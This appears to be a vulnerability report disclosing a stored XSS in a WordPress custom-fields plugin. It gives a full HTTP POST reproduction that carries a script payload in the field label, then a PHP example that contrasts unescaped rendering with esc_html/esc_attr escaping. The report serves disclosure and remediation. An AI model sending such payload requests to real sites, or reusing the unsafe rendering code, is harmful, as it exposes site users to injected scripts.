Hey,
This plugin contains an XSS vulnerability because it does not properly sanitize the fields Field Label and Field Name. This allows authenticated users to inject arbitrary HTML/JS.
I found a simple stored XSS in this plugin.
Reproduce:
```http
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://localhost/wordpress/wp-admin/post.php?post=7&action=edit&message=1
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1343974779%7C1304ba20ae5f10381f10d45816b42a46; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1343804013; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1343974779%7C2d847c25747638e0207d8ce22b2bdc1e; __atuvc=7%7C31
Content-Type: application/x-www-form-urlencoded
Content-Length: 2048

_wpnonce=df82f5886b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D7%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=acf&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D7%26action%3Dedit%26message%3D6&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D7%26action%3Dedit%26message%3D6&post_ID=7&autosavenonce=d13e3a0568&meta-box-order-nonce=80a1d4ab4e&closedpostboxesnonce=177b469010&post_title=teste&samplepermalinknonce=b87c2a523f&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=08&jj=01&aa=2012&hh=06&mn=45&ss=49&hidden_mm=08&cur_mm=08&hidden_jj=01&cur_jj=01&hidden_aa=2012&cur_aa=2012&hidden_hh=06&cur_hh=06&hidden_mn=45&cur_mn=53&original_publish=Update&save=Update&save_fields=true&fields%5B0%5D%5Bkey%5D=field_5018d1ab43dcf&fields%5B0%5D%5Blabel%5D=das%3Ch1%3Edas%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&fields%5B0%5D%5Bname%5D=das&fields%5B0%5D%5Btype%5D=text&fields%5B0%5D%5Binstructions%5D=&fields%5B0%5D%5Brequired%5D=0&fields%5B0%5D%5Bdefault_value%5D=&fields%5B0%5D%5Bformatting%5D=html&fields%5B1%5D%5Bkey%5D=field_5018d1ab44291&fields%5B1%5D%5Blabel%5D=&fields%5B1%5D%5Bname%5D=&fields%5B1%5D%5Btype%5D=text&fields%5B1%5D%5Binstructions%5D=&fields%5B1%5D%5Brequired%5D=0&fields%5B1%5D%5Bdefault_value%5D=&fields%5B1%5D%5Bformatting%5D=html&fields%5B999%5D%5Blabel%5D=New+Field&fields%5B999%5D%5Bname%5D=new_field&fields%5B999%5D%5Btype%5D=text&fields%5B999%5D%5Binstructions%5D=&fields%5B999%5D%5Brequired%5D=0&fields%5B999%5D%5Bdefault_value%5D=&fields%5B999%5D%5Bformatting%5D=html&location%5Brules%5D%5B0%5D%5Bparam%5D=post_type&location%5Brules%5D%5B0%5D%5Boperator%5D=%3D%3D&location%5Brules%5D%5B0%5D%5Bvalue%5D=post&location%5Ballorany%5D=all&menu_order=0&options%5Bposition%5D=normal&options%5Blayout%5D=default&options%5Bhide_on_screen%5D=&post_name=acf_teste
```
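The following is an added example, not code from the plugin or from the reporter, showing the mechanism behind the report above: the `fields[0][label]` value from the request (URL-decoded, it is `das<h1>das</h1><script>alert(1)</script>`) is stored and later echoed into an admin page unescaped. The two rendering functions (`render_field_unsafe`, `render_field_safe`) and the `<label>` markup are hypothetical stand-ins for whatever the plugin really emits; `esc_html()` and `esc_attr()` are the real WordPress escaping functions, with minimal fallbacks defined so the file also runs outside WordPress.

```php
<?php
// Added example (not the plugin's code): how an unescaped field label becomes
// stored XSS, and how context-appropriate output escaping neutralises it.

// Outside WordPress, esc_html()/esc_attr() do not exist; these stand-ins
// behave the same way for the purpose of this example. Under WordPress the
// real functions are used instead.
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Label and name exactly as sent in the request above, URL-decoded.
// In the real plugin these come back out of the database on every page load,
// which is what makes the XSS "stored".
$label = urldecode('das%3Ch1%3Edas%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E');
$name  = urldecode('das');

// Vulnerable rendering (hypothetical shape of the plugin's output):
// the stored values are concatenated straight into HTML.
function render_field_unsafe(string $label, string $name): string {
    return '<label for="' . $name . '">' . $label . '</label>';
}

// Hardened rendering: escape at the point of output, choosing the escaper
// that matches the context (attribute value vs. element text).
function render_field_safe(string $label, string $name): string {
    return '<label for="' . esc_attr($name) . '">' . esc_html($label) . '</label>';
}

echo "unsafe: ", render_field_unsafe($label, $name), "\n";
echo "safe:   ", render_field_safe($label, $name), "\n";
```

Run it with `php example.php`: the first line contains a live `<script>` element, the second has every `<`, `>` and quote turned into entities so the browser shows the payload as literal text. Escaping on output is the fix that actually closes the hole; stripping tags on save (for instance with `sanitize_text_field()` before the value is written) is a useful second layer but does not replace it, because data already in the database and data written by other code paths would still be rendered raw.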